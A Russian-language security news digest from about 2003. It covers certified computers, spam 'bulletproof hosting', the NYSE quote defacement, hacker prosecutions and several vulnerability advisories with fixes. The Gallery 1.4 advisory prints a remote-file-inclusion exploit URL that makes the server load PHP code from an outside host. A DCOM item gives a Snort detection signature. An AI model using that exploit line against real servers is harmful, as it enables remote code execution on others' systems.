Производственная компания "Аквариус", входящая в Национальную компьютерную корпорацию, получила новый сертификат Государственной технической комиссии при Президенте РФ. Данный документ удостоверяет, что серийно производимый ПК Aquarius в базовой комплектации с периферийным оборудованием различных производителей является защищенным техническим средством обработки информации ограниченного доступа, не содержащей сведений, составляющих государственную тайну. Согласно полученному сертификату, компьютеры Aquarius соответствуют "Специальным требованиям и рекомендациям по технической защите конфиденциальной информации" и могут использоваться в автоматизированных системах класса до 1Г включительно в соответствии с требованиями руководящего документа Гостехкомиссии России "Автоматизированные системы. Защита от несанкционированного доступа к информации. Классификация автоматизированных систем и требования по защите информации". В настоящее время "Аквариус" является единственным российским производителем серийных сертифицированных компьютеров, которые могут использоваться в качестве средств защиты конфиденциальной информации.

Израильская компания SNAPSHIELD сообщила о выпуске модуля шифрования голоса для телефонов Sony Ericsson T610, T310, T230 и Z600. Решение поддерживает существующую инфраструктуру GSM-сетей и не требует специализированных телефонов. Выступая на пресс-конференции, исполнительный директор компании SNAPSHIELD отметил, что в рамках обнаруженных уязвимостей GSM сетей представленное решение, соответствующее требованиям военных стандартов по шифрованию голоса, может быть вполне востребованным.

"Навесок" к телефону, бесспорно, интересный, правда, существуют сомнения насчет того, что такая разработка может быть разрешена к применению в России...

Последним новшеством в области хакерства является техника создания веб-сайтов, которые невозможно проследить. Одна польская группа уже рекламирует "невидимый пуленепробиваемый хостинг" в онлайновыйх форумах для спаммеров.

За US$ 1,500 в месяц, они обещают защищать сайт от сетевых средств трассировки, таких как traceroute и whois, используемых противниками спама. Новая техника делает эти средства бессильными так как результат трассировки такого сервера меняется каждый раз.

По словам одного из представителей группы по имени Tibul, прелесть невидимого хостинга в том, что сайт может располагаться даже на серверах крупнейших фирм предлагающих веб-хостинг и гарантирующих защиту от спама.
2

В испанском городе Бенедорм прошла 72-я сессия генассамблеи Интерпола. На ней присутствовали представители национальных бюро этой организации из 120 стран мира, а также наблюдатели из Европола, ООН, Международного военного трибунала в Гааге, Евросоюза, других международных организаций. В работе ассамблеи приняла участие и делегация Украины.

Среди обсуждавшихся вопросов - международное сотрудничество правоохранителей в борьбе с терроризмом, нелегальной миграцией, киберпреступностью, незаконным оборотом синтетических наркотиков, преступлениями в финансовой сфере. В повестке дня стояло и внедрение информационно-коммуникационной системы "І-24/7". Она построена с учетом новейших технологий и предоставляет качественную, оперативную и безопасную связь между НЦБ Интерпола разных стран. В Украине система действует с июля и дает возможность за считанные секунды выходить на контакт с правоохранительными органами других государств.
3

Неизвестные хакеры проникли в систему котировок крупнейшей фондовой биржи США - Нью-йоркской (NYSE). Взломанная система фондовой биржи некоторое время показывала, что в ходе торгов в среду 8 октября индекс Dow Jones потерял более 1200 пунктов, а его значение вечером в среду составило 8448 пунктов. По крайней мере, именно об этом информировала посетителей сайта его заглавная страница.

Если бы американский рынок акций действительно продемонстрировал подобную динамику, это означало бы, что американские компании, чьи акции обращаются на NYSE, потеряли в совокупной стоимости около 1,5 триллионов долларов. Такого не было даже 11 сентября.

На инвесторов сообщение особого влияния не сказалось, так как все прочие индексы - NYSE Composite и S&P 500 - показывали, что на рынке все нормально. Да и на других сайтах, например, на популярном финансовом ресурсе CNBC с Dow Jones все было нормально. Индекс действительно снизился по итогам торгов в среду, однако, не на 1206 пунктов, а всего лишь на 23,71 (0,25%).

Официального заявления биржи по этому поводу пока нет. В настоящее время неполадка устранена.
4

Приглашаем Вас на церемонию Торжественного открытия VI Всероссийского форума «Банковская безопасность: состояние и перспективы развития», которое состоится 15 октября 2003 г. в 11.00 в Мэрии Москвы (Новый Арбат, 36) и на пресс-конференцию для журналистов в 12.00.

Форум проводится при поддержке Администрации Президента РФ, Министерства внутренних дел России, Комитета по безопасности Государственной Думы, Торгово-Промышленной Палаты РФ, Российского союза промышленников и предпринимателей и при содействии партии «Единая Россия», НАСТ России и Ассоциации защиты информации.
Генеральным и информационными партнерами выступили информационные агентства РБК, АК&М, Bloomberg (США).

Цель Форума – способствовать углублению профессионального диалога между банковским сообществом, участниками индустрии безопасности и федеральными органами государственной власти по идентификации, локализации и подавлению возникающих угроз в кредитно-финансовом секторе Российской экономики.

На Форум приглашены: руководители банков, служб безопасности коммерческих банков и финансовых организаций, разработчики систем банковской безопасности, специалисты производственных и торговых компаний.

На открытии Форума будут присутствовать:

• Коваль А.П. – член Комитета ГД по кредитным организациям и финансовым рынкам;
• Жуков А.Д. – председатель Комитета ГД по бюджету и налогам;
• Медведев Ю.Г. – заместитель председателя комитета ГД по кредитным организациям и финансовым рынкам;
• Газарян Ю.Г. – представитель Экономического управления Администрации Президента РФ;
• Тарачев В.А. – депутат Государственной Думы ФС Российской Федерации, заместитель председателя банковского комитета;
• Веревкин-Рохальский С.В. - генерал-лейтенант, заместитель министра МВД России, директор Федеральной службы по налоговым и экономическим преступлениям;
• Пугачев С.В. – начальник управления стандартизации Госстандарта РФ;
• Емельянов Г.В. – президент Ассоциации защиты информации;
• Стрельцов А.А. – представитель Совета безопасности РФ и многие другие.

Оргкомитет форума

ЗАО «Компания Безопасность» объявляет о завершении первого этапа интеграции устройства Vicoder в свой ПК BSW.

Цифровой видеомагнитофон Vicoder специально разработан Компанией Безопасность для работы в локальных и глобальных компьютерных сетях и позволяет создавать системы видеонаблюдения, в которых требуется просмотр видео от любой камеры с нескольких рабочих мест оператора одновременно по сети Ethernet/Internet. Исключительно высокая степень сжатия MPEG-4 позволяет архивировать большие объемы данных на жесткий диск и, что самое главное, транслировать большое количество видеопотоков по сети. Vicoder обеспечивает работу с архивом без прерывания записи и дистанционное управление системой при работе в сети.

Изначально Vicoder поставлялся в комплекте с собственным программным обеспечением, построенных на технологии «тонкого» клиента. И вот теперь в целях унификации представления информации для оператора интегрированной системы безопасности, а также облегчения настройки автоматических реакций Vicoder на события других технологических подсистем физических средств охраны, в программный комплекс BSW встроена поддержка конфигурирования и доступа к так называемым «тревожным записям». Администратор BSW с помощью специального компонента системы определяет события, которые будут инициировать запись, и параметры видеоряда (время пред- и после записи, качество записи и т.п.). При наступлении отмеченного события ПК BSW запрашивает у Vicoder требуемый видеоролик и сохраняет его на заданном рабочем месте. В дальнейшем оператор, обладающий правом доступа к архиву сообщений системы безопасности, имеет возможность проанализировать прикрепленные к ним видеоролики. К одному событию может быть прикреплено произвольное количество «тревожных видеозаписей», доступ к которым может осуществляться одновременно (с возможностью синхронизации времени просмотра).

8 октября завершен первый этап строительства собственного дата-центра (центра обработки данных, ЦОД) проекта DATA FORT компании IBS, который расположен на улице 8 марта в Москве. Его площадь около 400 кв. метров, что в 2 раза больше площади арендуемого ныне DATA FORT центра обработки данных, расположенного по тому же адресу.

В новом дата-центре есть как технологический блок для размещения оборудования, так и помещения для организации резервных офисов в рамках услуги DATA FORT по обеспечению непрерывности бизнеса клиентов. Эта услуга предполагает, что при возникновении проблем с работоспособностью основного офиса клиента в случае наступления форс-мажорных обстоятельств его ключевой персонал размещается в резервном офисе DATA FORT и начинает работать с дублем своей информационной системы, расположенным в дата-центре.

Новый центр обработки данных позволит разместить более 1500 серверов клиентов. Емкость 2 хранилищ данных и систем резервного копирования, которыми располагает дата-центр – свыше 50 терабайт.

Дата-центр оборудуется самыми совершенными системами:

• пожаротушения, с эффективной системой газо-дымоудаления;
• кондиционирования, причем выход из строя одного из кондиционеров не нарушает работу системы;
• бесперебойного питания (система питания 1 категории надежности: используются ИБП, независимый дизель-генератор и пр.);
• защиты от несанкционированного доступа;
• обеспечена герметичность и гидроизоляция.
• и другими необходимыми для непрерывного функционирования дата-центра средствами.

Завершение строительства планируется в декабре этого года.

Немного подробностей

«Оболочка» дата-центра представляет собой конструкцию из стальных «сэндвичевых» панелей с керамической теплоизоляцией на внешнем стальном каркасе.

В строении обеспечена гидроизоляция. Внешняя относительно строений аппаратура располагается на постаментах высотой 0.5 метра от уровня пола для предотвращения затопления. Влагостойкие кабели и другая подводка выполнены в несущих конструктивах, исключающих попадание и накопление воды.

Дата-центр оборудуется высокопрочным фальшполом высотой 0.5м, поверхность под которым обработана для исключения пылеобразования и накопления статического электричества. Металлические конструкции строения и фальшпол эффективно заземлены.

Важным является удобство доступа обслуживающего персонала во внутренние помещения дата-центра: высота потолка - более 2,5 м, дверные проемы – шириной более 1,3 м и высотой более 2,3 м, двери металлические.

Для размещения источников бесперебойного питания (ИБП) используется отдельно стоящее гидроизолированное и кондиционируемое строение.

Дата-центр оборудуется газовой системой пожаротушения, обеспечивающей эффективное тушение в условиях объемного загорания пучков силовых кабелей, фальшпола и стоечной аппаратуры. Предусмотрена эффективная система газо-дымоудаления, не допускающая возрастания внутримодульного давления до уровня угрожающего повредить стеновые и потолочные конструкции и дверные проемы при срабатывании системы.

Система кондиционирования построена по схеме N+1. Выход из строя одного из кондиционеров не нарушает расчетные параметры системы. Система оборудуется датчиками утечки воды.

Система питания - 1 категории надежности: используются ИБП, независимый дизель-генератор, конструктив которого позволяет дозаправку без останова дизеля, основная разводка состоит из 2 внутренних независимых трехфазных линий, каждая запитана от независимого ИБП.

Дата-центр оборудуется независимой системой контроля доступа и видеонаблюдения.

Журнал «Системы безопасности», учитывая пожелания своих читателей, объявляет о новой услуге. Журнал опубликует на своих страницах информацию о тендерах компаний на оснащение комплексными системами безопасности, включающими системы ССTV, контроля и управления доступом, охранно-пожарной сигнализации и др.

В современной российской экономике рынок безопасности является одним из наиболее перспективных. Высокие темпы роста обусловлены объективными факторами развития экономики государства. Обострение рыночной конкуренции, рост масштабов деятельности компаний, увеличение бюджетных дотаций силовым структурам формируют повышенный спрос на средства, технологии и услуги безопасности. Привлекательность рынка естественным образом обусловила высокую конкурентность. Идет активная борьба между технологиями, торговыми марками, компаниями.

В этих условиях для компаний, имеющих намерение установить комплексные системы безопасности, выходом становится объявление тендера для поставщиков.

Журнал «Системы безопасности», аудитория которого включает крупнейших поставщиков систем безопасности, готов предоставить свои страницы для публикации информации о тендере. Журнал выступит мощным каналом распространения информации об объявленном тендере, и будет способствовать принятию наиболее адекватного решения о выборе поставщика.

Агенты спецслужб сообщают о первой в истории атаке на составляющие транспортной инфраструктуры. Во взломе и блокировании работы компьютерной сети крупнейшего американского порта техасского города Хьюстон подозревается девятнадцатилетний хакер Аарон Кефри.

Некая молодая особа, известная под ником Bokkie, разозлила молодого человека своими антиамериканскими высказываниями. Кефри, страдающий одной из форм аутизма, решил отомстить своей знакомой по интернет-чатам, совершив нападение на порт Хьюстона. Он закидал компьютер Bokkie потоком ничего не значащих электронных сообщений, однако результатом атаки стало "падение" всей сети порта. К счастью, в результате нападения никто не пострадал. Не повезло только компьютерной системе Хьюстона - она была парализована на протяжении всего дня 20 сентября.

Сейчас еще не известно, какое наказание будет вынесено в отношении хакера, дело Кефри находится на стадии рассмотрения, сообщает Ananova.

Девятнадцатилетнему хакеру из Финиксвилля, штат Пенсильвания, предъявлено обвинение в мошенничестве. Как сообщает агентство Reuters, он сумел взломать одну из учётных записей брокерской конторы TD Waterhouse.

Взломщик получил доступ к учётной записи неназванного жителя Бостона. Раздобытые данные мошенник тут же использовал для покупки пут-опционов (контракты на продажу ценных бумаг) на обыкновенные акции компании Cisco Systems. Затем он собирался продать эти опционы.

Опционы дают право их держателю продать или купить ценные бумаги, такие как акции или облигации, по заранее установленной цене в определенный день.

Хакер решил продать опционы, потому что цена акций компании Cisco Systems оказалась выше цены по опциону. Используя свою собственную учётную запись, он разместил заявки на продажу своих опционов, и одновременно - на покупку 7200 опционов Cisco, но уже с учётной записи своей жертвы. В итоге, он воспользовался 47 тысячами долларов с чужого счета и сэкономил 37 тысяч долларов на своих опционах.

Комиссия по ценным бумагам США (Securities and Exchange Commission) будет добиваться того, чтобы злоумышленник вернул полученные им деньги, а также выплатил компенсацию за моральный ущерб. Размер компенсации пока не определен.

Программа: Gallery 1.4 Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Gallery. Удаленный атакующий может выполнить произвольный PHP код на уязвимом сервере. Переменная GALLERY_BASEDIR в сценарии index.php включает сценарий util.php, не проверяя его фактическое местоположение. В результате удаленный атакующий может включить произвольный PHP код, расположенный на удаленном сервере, который будет выполнен на уязвимом сервере с привилегиями Web сервера. Пример/Эксплоит: http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/ где http://tester/util.php URL производителя: Решение: Внесите следующее исправление в сценарий index.php в каталоге setup: if (!isset($GALLERY_BASEDIR)) { $GALLERY_BASEDIR = './'; } <pre> На <pre> $GALLERY_BASEDIR = './';

Gallery 1.4 including file vulnerability

Программа: Hummingbird CyberDOCS DOCSFusion Server 3.1-3.9,4.0 Опасность: Средняя Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в CyberDOCS. Злонамеренный пользователь может выполнить SQL инъекцию и XSS нападения. Уязвимость в проверке правильности входных данных обнаружена в сценарии входа в систему "loginact.asp". В результате удаленный пользователь может манипулировать существующим Sql запросом, чтобы внедрить произвольный Sql код, который будет выполнен на основной базе данных. Несколько Web страниц не проверяют возвращенные данные, представленные пользователем. В результате удаленный пользователь может эксплуатировать XSS нападение против пользователей CyberDOCS. Страница ошибки, сгенерированная при неудачной попытке входа в систему, раскрывает абсолютный путь к Web root каталогу. Небезопасные разрешения по умолчанию установлены на нескольких CyberDOCS сценариях (".inc"). В результате удаленный пользователь может раскрыть чувствительную информацию, содержащуюся в этих сценариях. URL производителя:http://www.hummingbird.com/ Решение:Установите соответствующее обновление: ftp://ftptlh.hummingbird.com/patches/cyberdocs/cyd40p4.exe

http://www.procheckup.com/security_info/vuln_pr0302.html

Программа: Microsoft Windows 2000 Advanced Server Microsoft Windows 2000 Datacenter Server, Microsoft Windows 2000 Professional, Microsoft Windows 2000 Server. Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Windows 2000. Злонамеренный пользователь может скомпрометировать уязвимую систему. Уязвимость связанна с ошибкой проверки границ в Microsoft Message Queuing Service ("mqsvc.exe") при обработке критериев поиска в "MQLocateBegin" пакетах. В результате злонамеренный пользователь может послать чрезмерно длинную, специально обработанную структуру к параметру "pRestriction", чтобы вызвать переполнение динамической памяти. URL производителя:http://www.microsoft.com Решение: Уязвимость устранена в Service Pack 4 http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp

Windows Message Queuing Service

Программа: PeopleSoft PeopleTools 8.42

Опасность: Низкая

Наличие эксплоита: Не нужен

Описание: Две уязвимости обнаружены в PeopleTools. Удаленный авторизованный пользователь может выполнить DoS нападение или раскрыть различную чувствительную информацию.

1. Используя комбинацию клавишь {Control} {J}, система отобразить пользователю различную чувстительную информацию, которая не должна быть доступна всем пользователям.
2. Поля "LONGCHAR" и "VARCHAR" позволяют загружать очень большие объемы данных, в результате пользователь может вызвать условия отказа в обслуживании.

URL производителя:http://www.peoplesoft.com/corp/en/products/ptools/index.jsp

Решение: Ограничьте размер "LONGCHAR" и "VARCHAR" переменных. Измените поведение системы при нажатии на комбинацию {Control} {J}.

В этом году в России откроется центр по продвижению операционной системы (ОС) Linux - главного конкурента сверхраспространенной ОС Microsoft Windows. В открытии центра участвует Минсвязи, что увеличивает вероятность ускорения внедрения Linux именно в госструктурах.

Министерство связи и компания IBM подписали меморандум об открытии так называемого центра компетенции Linux. Такие центры есть у многих крупных ИТ-компаний - в них заказчикам демонстрируют работу реальных информационных систем. Центр будет создан на базе Московского технического университета связи и информатики (МТУСИ). В компании IBM "Финансовым Известиям" сообщили, что в центре компетенции также можно будет отработать перенос конкретных приложений с других платформ на Linux. В компании подчеркивают, что имеют в виду "любые другие платформы", но многим ясно: речь идет о стимулировании перехода заказчиков с ОС компании Microsoft. Монополизм на этом рынке Microsoft не нравится многим. Та же IBM, которая, в свое время сделав заказ Биллу Гейтсу на разработку операционной системы MS DOS и положив тем самым начало этому монополизму, в развитие Linux уже вложила около $1 млрд.

От Минсвязи меморандум подписал первый замминистра Андрей Коротков, от IBM - вице-президент IBM по корпоративной стратегии Вал Рамани. При этом Андрей Коротков заявил, что внедрение ПО с открытым кодом становится все более популярным в России. У этого заявления есть определенная подоплека.

Дело в том, что противостояние между Microsoft, которая традиционно не открывает коды своих продуктов, и компаниями, исповедующими "открытый подход", обострилось прежде всего в государственном секторе. Во многих странах постоянно возникает дискуссия о том, что госструктуры работают на продуктах, в которых теоретически могут быть заложены "нештатные функции", или, как говорят программисты, "закладки". Если раньше альтернативы Microsoft Windows практически не было, то теперь на рынке существует множество реализаций "открытой идеологии" в виде Linux-продуктов. В компании IBM "Финансовым Известиям" сообщили, что в таких странах, как Великобритания, Франция, Италия, Испания, Бельгия, Нидерланды, Китай, Япония, Корея, Индия, госструктуры охотно используют IBM Linux. Видимо, из-за угрозы окончательного перехода государств на Linux компания Microsoft стала открывать коды своих ОС госструктурам. Кстати, Россия первой в мире подключилась к этой программе - наши спецслужбы, как всегда, на страже.

Противостояние Windows и Linux в России пока не так ярко выражено. Это объясняется тем, что у нас не очень много специалистов по реальному внедрению Linux - правда, любителей поговорить о своей нелюбви к Гейтсу и о спасительном для России переходе на Linux можно встретить в любом чате, посвященном ИТ. Последнее время разговоры о "Microsoft-зависимости" участились и в органах госвласти.

Впрочем, сама Microsoft не собирается сдаваться без боя. В компании "Финансовым Известиям" сообщили, что своего центра компетенции у них нет. Однако компания поддерживает открытие многочисленных центров на базе системных интеграторов. Причем, как правило, в создании таких центров участвуют производители компьютерного "железа" - такие, как HP и Intel. Последнее время к участию в работе таких центров проявляют интерес крупные консалтинговые компании, к советам которых в области ИТ (например, какую ОС выбрать) все больше прислушиваются российские клиенты.

Программа: IRCnet IRCD 2.10-2.10.3p3. Опасность: Низкая Наличие эксплоита: Нет Описание: Несколько переполнений буфера обнаружено в IRCnet IRCD сервере. Локальный пользователь может аварийно завершить работу сервера. 1. Переполнение буфера расположено в m_join() функции в channel.c файле. Локальный пользователь может аварийно завершить работу сервера. 2. Переполнение буфера обнаружено в функции do_query_name() в res.c и в функции add_local_domain() в s_bsd.c файле. Атакующий может представить специально обработанное имя хоста, чтобы аварийно завершить работу приложения. Возможно уязвимости могут использоваться для выполнения произвольного кода с привилегиями IRCD демона. URL производителя:http://www.irc.org Решение: Установите обновленную версию программы (irc2.10.3p4): ftp://ftp.irc.org/irc/server/irc2.10.3p4.tgz

ChangeLog

После тщательной проверки, сразу из нескольких источников стало известно, что “универсальный ”эксплоит против DCOM№2 уязвимости, опубликованный в среду на нашем форуме, работает даже при установленной заплате MS03-39. Пока удалось настроить эксплоит только для DoS нападения, но скорее всего эксплоит можно оптимизировать и для выполнения произвольного кода. Всем пользователям срочно рекомендуется закрыть уязвимые порты для доступа из интернет, так как в ближайшее время возможно появление нового разрушительного червя, эксплуатирующего неустраненную уязвимость. В настоящий момент уязвимость проверена на следующих системах: * Microsoft Windows XP Professional * Microsoft Windows XP Home * Microsoft Windows 2000 Workstation Также разработана SNORT сигнатура для этой уязвимости: alert TCP any any -> any 135 (msg:"RPC Vulnerability - bind initiation";sid:1; rev:1; content:"|05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00 D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00 a0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B10 48 60 02 00 00 00|"; flow:to_server,established;classtype:attempted-admin;)

VigilantMinds Security Operations Center Источник